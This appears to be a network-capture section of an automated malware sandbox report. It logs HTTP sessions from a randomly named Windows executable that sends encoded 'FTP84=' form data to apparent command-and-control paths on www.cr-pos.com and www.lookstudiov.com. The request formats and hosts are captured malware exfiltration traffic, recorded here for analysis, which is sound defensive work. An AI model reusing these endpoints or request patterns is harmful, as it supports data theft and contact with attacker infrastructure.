                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Date: Mon, 01 Jul 2024 17:25:23 GMT
                                                  Server: Apache
                                                  X-Powered-By: PHP/8.2.20
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  Link: <http://lookstudiov.com/wp-json/>; rel="https://api.w.org/"
                                                  Content-Encoding: gzip
                                                  Data Raw: 33 30 34 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7d 77 db 36 b2 f7 df cd a7 60 94 d3 44 da 8a 92 28 c9 b2 2d 5b e9 ed 76 db e7 f6 39 dd 6d 4f d3 de bb 7b 37 7b 7c 28 09 b2 98 48 a2 96 a4 fc b2 5e 7f f7 fb 9b 01 40 02 7c d1 8b ed 74 93 bb 4d 6b 5b 02 81 99 c1 60 30 18 60 06 c3 67 e7 cf ff f0 c3 d7 3f ff e5 c7 6f 9c 79 b2 5c bc 7e 76 4e 7f 9c 85 bf ba 1c d5 c4 ca fd e5 4d cd 99 fa 89 ef c6 fe 95 70 27 e1 22 8c dc 78 32 17 4b 31 aa dd 8a 58 3d bc dd bc 0f dc 44 96 2e 82 cb 79 52 23 40 c2 9f be 7e e6 e0 df f9 52 24 be 33 99 fb 51 2c 92 51 ed 97 9f bf 75 4f 50 23 7b b4 f2 09 de 55 20 ae d7 61 94 d4 9c 49 b8 4a c4 0a 55 af 83 69 32 1f 4d c5 55 30 11 2e 7f 69 3a c1 2a 48 02 7f 01 32 fc 85 18 79 ad 8e 05 6a 9e 24 6b 57 fc 7d 13 5c 8d 6a 7f 76 7f f9 ca fd 3a 5c ae fd 24 18 2f 84 01 37 10 23 31 bd 14 ba e5 22 58 bd 77 22 b1 18 d5 d6 51 38 0b a8 ea 3c 12 b3 51 8d a0 0d db ed cb e5 fa b2 15 46 97 ed 9b d9 aa ed 79 68 f6 d9 79 12 24 0b f1 fa 47 ff 52 38 ab 30 71 66 e1 66 35 75 5e be 38 e9 7a de 99 f3 7d 18 [TRUNCATED]
                                                  Data Ascii: 3041}}w6`D(-[v9mO{7{|(H^@|tMk[`0`g?oy\~vNMp'"x2K1X=D.yR#@~R$3Q,QuOP#{U aIJUi2MU0.i:*H2yj$kW}\jv:\$/7#1"Xw"Q8<QFyhy$GR80qff5u^8z}w$i:uuI>pg_E8LWiW_-7X_q=\x@h' 1]kz&ajGqrGDfo3[!.@o^&=*Oc2AK<uuX7"Ie/6ooqFmmOHmsmi7Z&noW_]>24F'njsers}vd?(V.dVejh:jyI&KN=mVz\5qSrgR$g.i,$f,_vfY,$anaZqam=i4u DkF?IR4;M|WW>TDu.H4P^/~PT4s%X%WQE4>[h
                                                  Jul 1, 2024 19:25:23.369887114 CEST1236INData Raw: a6 69 c5 34 35 9f 8a 9a c6 59 24 92 4d b4 72 92 96 80 10 dc d6 35 03 89 7d 8d 3b f5 50 8c 46 a3 e8 af c9 df ee 1b 19 83 37 9a c1 f1 75 40 ec 47 ed 09 24 aa 36 5b f8 97 b5 a1 6a b8 42 a5 da db cd f4 a4 37 c1 ef d9 ac f7 76 33 13 9d d9 db 4d b7 d3
                                                  Data Ascii: i45Y$Mr5};PF7u@G$6[jB7v3M?%jcZv:Y@TelGqhJ?wGga|6LV7J"WD]3=XSk>"e>N"vY|DJ8s;-
                                                  Jul 1, 2024 19:25:23.369898081 CEST1236INData Raw: af 9c a5 98 06 fe e8 15 a6 80 dc a2 67 03 7e c9 36 93 5b 36 dc e3 70 7a 7b e7 ba 18 6f da e5 63 37 e4 aa 33 15 77 bc 00 6f 86 ce 8b 0e ff 3b 2b ad 33 b9 f5 57 a8 b8 09 e2 b9 7b 89 cd 0b aa fb e3 f1 c9 a4 57 5e fd 7a 1e 24 02 75 66 fc af bc ce 1a
                                                  Data Ascii: g~6[6pz{oc73wo;+3W{W^z$ufg(Td)YWtEyZ7l]R08tj"OLMht+~<NG$1Vul\:'lDLmN{bLd&Z/y`h4v}R#nQzGSq.~}
                                                  Jul 1, 2024 19:25:23.369946957 CEST1236INData Raw: 16 7e 0a 2b fb 98 07 95 52 a5 44 45 9e 3a 28 01 91 84 5f fa 90 33 d9 21 4d 3b 57 6e 05 31 d6 f7 5b 88 ba 8b 41 be 6e 38 e0 87 49 b5 f9 f9 4e 8a a0 cd a4 ce d9 6e 78 19 e5 08 86 d0 fd b1 a1 a9 2e ec 84 f5 3b bb 99 39 52 16 75 3b e0 61 b6 c0 69 ed
                                                  Data Ascii: ~+RDE:(_3!M;Wn1[An8INnx.;9Ru;ai~.f}h yyE/,2+0LuFE<Ze'.uG 8l]j-`R;0O1XCONFI=Ee8SeX>8"2-H;w,h`od;ni%
                                                  Jul 1, 2024 19:25:23.369959116 CEST1236INData Raw: 74 0e e9 c4 02 be 35 9f 65 d0 bf 16 71 b8 94 d7 98 f6 a6 9e 53 84 c4 6d 92 ea b6 02 15 e1 da df 35 ae 1a cb bb 37 b8 81 3a 0d a3 36 ad 69 0a 01 13 8f f0 58 eb 0a 0e c2 54 5b 5e ff 10 c2 79 22 3d 80 df 26 c5 7c 3b 88 ae 09 49 16 52 ce 85 4c 1c 7a
                                                  Data Ascii: t5eqSm57:6iXT[^y"=&|;IRLz-HIL=ar5}qh!#Nebwz*><\MtQI0$PJS%e +G~tvRQe#|'&`B|&&X
                                                  Jul 1, 2024 19:25:23.369968891 CEST1236INData Raw: f2 e6 12 57 ae 9d 41 b7 89 eb d5 74 2a e3 d1 85 64 c8 ba 77 44 bf 60 61 3a 2e 7d d4 01 b7 43 2f bd 4f 95 7e ca 19 a8 a4 a1 8c 1f ad 9e 14 03 9f 68 82 23 50 5f c9 98 1c 8a d8 65 95 5a 10 14 53 80 52 01 d3 4d 68 7d d2 73 d3 9c 25 bb 1b cd 43 78 b3
                                                  Data Ascii: WAt*dwD`a:.}C/O~h#P_eZSRMh}s%Cx&Z +xEb{^}sS3Z")>DW)P{dcjI*O7]eun'*Y.M*A)e-gY4 4Wx$.:,n
                                                  Jul 1, 2024 19:25:23.369982004 CEST1236INData Raw: f4 b2 9e a2 07 cb e8 40 75 1b 55 49 ed ca f6 e2 88 3a c8 b0 ba 5d 60 8a 05 f7 01 bd b4 db 57 d3 af 43 8a 4e b3 70 22 19 2c a3 36 47 72 4b 53 22 f9 a6 e7 77 19 ac d2 03 e5 53 ca 10 6a 2f 51 6a a9 56 53 e6 02 b3 e8 02 3b 1d 3e e4 8e 2f e4 ae 54 1f
                                                  Data Ascii: @uUI:]`WCNp",6GrKS"wSj/QjVS;>/TjjLev8*b;*45!ooVfH~)A442kTS$-MjtNhomr}Lj7g[jH ['B[26_b:<w
                                                  Jul 1, 2024 19:25:23.370024920 CEST1000INData Raw: 44 79 53 b5 7f 29 a5 08 e0 bb 0c 27 a1 c9 d2 22 b9 38 4d 86 47 10 11 e5 17 72 04 1f 47 71 21 53 9b ca 25 17 6f 70 6f 79 86 37 85 b4 d3 4f 36 59 94 b9 4d 32 32 ad f0 81 28 41 5c e0 62 11 89 2b e1 2f 48 7a d3 2f 95 f4 18 75 f2 24 91 03 99 13 0d f2
                                                  Data Ascii: DyS)'"8MGrGq!S%opoy7O6YM22(A\b+/Hz/u$6q[at|[f8\Zyiw5Gm\.to7Bj?'|%gK(^sc$ZjGnH.=*$s}l vMK5l
                                                  Jul 1, 2024 19:25:23.370038986 CEST1236INData Raw: 99 0a 0f 6f 36 c7 ec d3 f3 58 c9 d9 81 30 e4 e2 a9 35 82 ca ab 65 86 6c d9 62 a3 69 d7 7f a5 5d aa f4 45 29 e1 e5 3c a4 f6 a6 b4 90 b0 24 01 92 76 4a 09 29 85 74 9e 8a 88 c6 ae ff aa e1 d5 5f e9 af 2a 52 02 7e ae 4e 1b 4d 96 23 1b ad ce fd 47 9a
                                                  Data Ascii: o6X05elbi]E)<$vJ)t_*R~NM#GN7fmvJjY=5Ei!vRvUtO>)q!j\8Q" y:^:(0O%T=c-ks$`RADe/ryi9^j].|-m|)n
                                                  Jul 1, 2024 19:25:23.370055914 CEST1236INData Raw: 2a 05 1e 21 75 d5 06 f3 53 b6 d6 a4 86 08 9a 0a 26 ef 1f 08 72 bd 89 e7 36 3c 78 50 b3 49 48 d4 68 44 44 4e ae 3b 88 91 1a db 88 73 f2 8d 97 6c 28 6e 54 ce 14 5b 55 79 e9 10 8c 37 e3 6c 45 51 9c aa 84 6e 90 9c ce e6 a9 ed 3a d7 72 6d e3 3b 51 e4
                                                  Data Ascii: *!uS&r6<xPIHhDDN;sl(nT[Uy7lEQn:rm;Q3{l[/9*]Nd$]/Vimm&nIn&02d#T#Wf]eTX{2 *4^ebC2"[R3?5d8*=VhL%&>:#~3u6&
                                                  Jul 1, 2024 19:25:23.370503902 CEST618INData Raw: 10 ea ed 3a bf 1d bd aa 83 2d b5 72 ff 76 f4 0a 7f ac 95 ed e5 5f 73 f4 6a 44 83 90 4e 91 99 a1 44 04 47 01 92 07 ca 97 9a eb 23 49 c4 24 ce fd c5 4c 07 26 22 b7 0b f2 e4 c8 2c 3a f2 7a b7 ca a0 a3 cc b8 5c ae 07 8e 6c 54 09 62 90 62 c7 43 d3 b1
                                                  Data Ascii: :-rv_sjDNDG#I$L&",:z\lTbbC0z7{Y%x_bp[}C;?o#:E~)u8c;1{jMI2STKGER&!lsu#W:G\gv\uiSv'b;^;u+


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.76447174.208.236.162806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:25.124460936 CEST458OUTGET /u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q+XwrjtzU7ALaZIX7Qr7xG0Tk3i+702mxinN9hpFEu+s7zPr8ql7seaWvhcu7+p+54MBjhZ2jhTmPmJLv4ka4ysGmOJ/DhiKAPXXpWbDV/sLTxWyGr8frfPdUs+6sgZH HTTP/1.1
                                                  Host: www.lookstudiov.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:25:25.770205021 CEST527INHTTP/1.1 301 Moved Permanently
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Date: Mon, 01 Jul 2024 17:25:25 GMT
                                                  Server: Apache
                                                  X-Powered-By: PHP/8.2.20
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: http://lookstudiov.com/u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q+XwrjtzU7ALaZIX7Qr7xG0Tk3i+702mxinN9hpFEu+s7zPr8ql7seaWvhcu7+p+54MBjhZ2jhTmPmJLv4ka4ysGmOJ/DhiKAPXXpWbDV/sLTxWyGr8frfPdUs+6sgZH
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.764472192.250.231.28806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:31.088466883 CEST710OUTPOST /b9jt/ HTTP/1.1
                                                  Host: www.cr-pos.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cr-pos.com
                                                  Referer: http://www.cr-pos.com/b9jt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 46 34 59 4b 6e 43 66 74 37 4d 41 46 56 38 45 6d 4f 30 67 7a 52 6d 38 4b 42 59 53 62 38 69 4f 32 34 32 57 6f 75 62 4f 50 76 6a 4c 63 2f 42 52 6c 68 34 5a 36 44 56 43 62 6c 38 79 65 7a 4a 4c 42 65 34 45 68 59 68 78 49 45 31 41 30 33 79 7a 4e 55 66 6b 48 2b 73 2b 36 39 7a 4b 6f 44 51 49 59 75 45 35 4c 6c 37 6a 70 6d 4c 6a 4d 51 35 78 62 49 6c 46 4a 73 38 50 66 58 39 4d 65 64 35 35 72 31 76 68 51 49 6e 31 46 55 79 66 6e 65 65 75 61 42 61 4c 34 62 77 4a 49 50 48 67 78 6a 43 74 65 45 46 52 59 58 67 69 70 53 52 57 37 52 73 58 63 51 68 71 52 69 58 6c 4f 78 57 4f 69 58 44 6d 74 78 55 45 68 71 47 57 4e 47 38 61 76 4f 65 6c 4a 2f 51 3d 3d
                                                  Data Ascii: FTP84=F4YKnCft7MAFV8EmO0gzRm8KBYSb8iO242WoubOPvjLc/BRlh4Z6DVCbl8yezJLBe4EhYhxIE1A03yzNUfkH+s+69zKoDQIYuE5Ll7jpmLjMQ5xbIlFJs8PfX9Med55r1vhQIn1FUyfneeuaBaL4bwJIPHgxjCteEFRYXgipSRW7RsXcQhqRiXlOxWOiXDmtxUEhqGWNG8avOelJ/Q==
                                                  Jul 1, 2024 19:25:31.592351913 CEST1236INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  X-Powered-By-Plesk: PleskWin
                                                  Date: Mon, 01 Jul 2024 17:25:30 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:25:31.592395067 CEST219INData Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                  Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.764473192.250.231.28806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:33.618639946 CEST730OUTPOST /b9jt/ HTTP/1.1
                                                  Host: www.cr-pos.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cr-pos.com
                                                  Referer: http://www.cr-pos.com/b9jt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 46 34 59 4b 6e 43 66 74 37 4d 41 46 55 63 30 6d 64 6b 63 7a 58 47 38 4a 4f 34 53 62 32 43 4f 79 34 32 53 6f 75 59 44 43 76 52 2f 63 2f 6a 35 6c 7a 74 74 36 45 56 43 62 74 63 79 48 39 70 4c 77 65 34 49 66 59 6b 78 49 45 31 45 30 33 32 37 4e 55 50 59 45 2f 38 2b 34 6f 44 4b 71 65 41 49 59 75 45 35 4c 6c 37 6e 48 6d 4c 4c 4d 54 4a 68 62 4a 48 74 4f 6c 63 4f 74 53 39 4d 65 4b 4a 35 76 31 76 68 79 49 69 64 76 55 33 62 6e 65 66 79 61 41 49 76 2f 43 41 4a 47 51 33 68 55 75 7a 55 70 64 6c 74 42 54 78 53 30 61 43 53 37 51 61 4b 2b 4b 44 6d 39 38 47 64 31 31 55 71 55 41 6c 37 59 7a 56 41 35 6e 6b 69 73 5a 4c 2f 46 44 4d 45 4e 70 67 59 67 47 54 54 63 55 48 49 77 51 56 32 37 44 77 59 35 46 63 6b 3d
                                                  Data Ascii: FTP84=F4YKnCft7MAFUc0mdkczXG8JO4Sb2COy42SouYDCvR/c/j5lztt6EVCbtcyH9pLwe4IfYkxIE1E0327NUPYE/8+4oDKqeAIYuE5Ll7nHmLLMTJhbJHtOlcOtS9MeKJ5v1vhyIidvU3bnefyaAIv/CAJGQ3hUuzUpdltBTxS0aCS7QaK+KDm98Gd11UqUAl7YzVA5nkisZL/FDMENpgYgGTTcUHIwQV27DwY5Fck=
                                                  Jul 1, 2024 19:25:34.131337881 CEST1236INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  X-Powered-By-Plesk: PleskWin
                                                  Date: Mon, 01 Jul 2024 17:25:33 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:25:34.131373882 CEST219INData Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                  Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.764474192.250.231.28806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:36.149451017 CEST1743OUTPOST /b9jt/ HTTP/1.1
                                                  Host: www.cr-pos.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cr-pos.com
                                                  Referer: http://www.cr-pos.com/b9jt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 46 34 59 4b 6e 43 66 74 37 4d 41 46 55 63 30 6d 64 6b 63 7a 58 47 38 4a 4f 34 53 62 32 43 4f 79 34 32 53 6f 75 59 44 43 76 52 6e 63 2f 51 42 6c 68 61 78 36 46 56 43 62 6e 38 79 61 39 70 4c 58 65 34 67 44 59 6b 30 71 45 33 4d 30 6d 6b 6a 4e 41 74 38 45 32 38 2b 34 33 54 4b 72 44 51 49 4e 75 45 70 58 6c 37 58 48 6d 4c 4c 4d 54 4c 70 62 41 31 46 4f 6a 63 50 66 58 39 4e 66 64 35 35 54 31 76 35 59 49 69 52 56 58 44 76 6e 65 2f 69 61 47 37 4c 2f 4b 41 4a 45 54 33 68 32 75 79 6f 32 64 6d 4a 6e 54 78 57 4f 61 41 53 37 63 2b 7a 32 66 43 32 67 71 57 52 61 30 6c 4b 48 4b 31 7a 36 79 32 63 6b 75 46 4c 44 64 62 66 52 41 39 55 4d 6c 47 5a 51 58 78 44 44 66 6d 49 43 54 41 66 73 62 51 4d 78 62 71 4a 54 6b 61 6b 77 49 59 63 6b 73 4e 51 2b 73 65 4a 6a 46 54 44 5a 72 4a 52 35 34 70 75 4b 45 41 4c 53 77 7a 58 57 47 53 36 72 65 65 56 71 36 77 68 39 30 76 4d 44 4d 57 46 34 4f 59 70 6f 6c 5a 48 49 49 52 33 32 33 2f 66 69 50 77 4d 30 34 62 76 70 4f 48 57 39 35 54 51 53 79 78 2b 66 41 6f 32 68 78 49 74 6b [TRUNCATED]
                                                  Data Ascii: FTP84=F4YKnCft7MAFUc0mdkczXG8JO4Sb2COy42SouYDCvRnc/QBlhax6FVCbn8ya9pLXe4gDYk0qE3M0mkjNAt8E28+43TKrDQINuEpXl7XHmLLMTLpbA1FOjcPfX9Nfd55T1v5YIiRVXDvne/iaG7L/KAJET3h2uyo2dmJnTxWOaAS7c+z2fC2gqWRa0lKHK1z6y2ckuFLDdbfRA9UMlGZQXxDDfmICTAfsbQMxbqJTkakwIYcksNQ+seJjFTDZrJR54puKEALSwzXWGS6reeVq6wh90vMDMWF4OYpolZHIIR323/fiPwM04bvpOHW95TQSyx+fAo2hxItkv2hO9qXE2vic+nd7vx3oFiqk9RM6fTRSKDe+liA82czH1RXEgyazao9eHlA80pmP/2LF43idEbjTzqPz81mv0agCfVxDawkYXvJlZki9baYnPqUKjDFud2Pj3szCfoFGYhXdsTxkWGCbSA0ZUrco+WukZ4+ytTYzi70nUDB/joNbEEh8T/bSj1umnl7AV0Dh4ZLi2YtFTgwEU6UNezfNlsUEC/VojLXoBZU4DRMfT/qO+PjYPhzRW4l5EXq0UHDaFpXX3bsARXK01Y/+5NKlEbrVqy+ylQgcpNUVzYYZEmzHsdaxHFAwv0G+5thBSGI/d4gZ3eLJGMAsrl0Aw348hEc9ULWLBQ49SRlzdK6w2+Z8Y65AfKDk4AYIrNWlMTlc0CNWYAA51XCBH2iyxTef8XvbfULaZkoEBo5f/04kXXHutqT3miZPAHFW55j4LMeZQK4D6v82zGzNx9gs7WkLvDBVKh0woTEic2TH1KNHbg758KxvwmhcMn56f1d25LHzS8dzLqv+D2Q2JOhgVHQvJ9/JBNfPkOmCJlVp+vixklinMHNTK9IGuCUoUQwNM0/1uw4eHvmh1eUd3iHVzvwM4oykrhlKEdDyimLg/J4ZNdw7aeR5tl6lgzsTeDID51w3l/bisn+PAMQrfqQOhXAUANBaaNp6Oc6nZF [TRUNCATED]
                                                  Jul 1, 2024 19:25:36.662798882 CEST1236INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  X-Powered-By-Plesk: PleskWin
                                                  Date: Mon, 01 Jul 2024 17:25:35 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 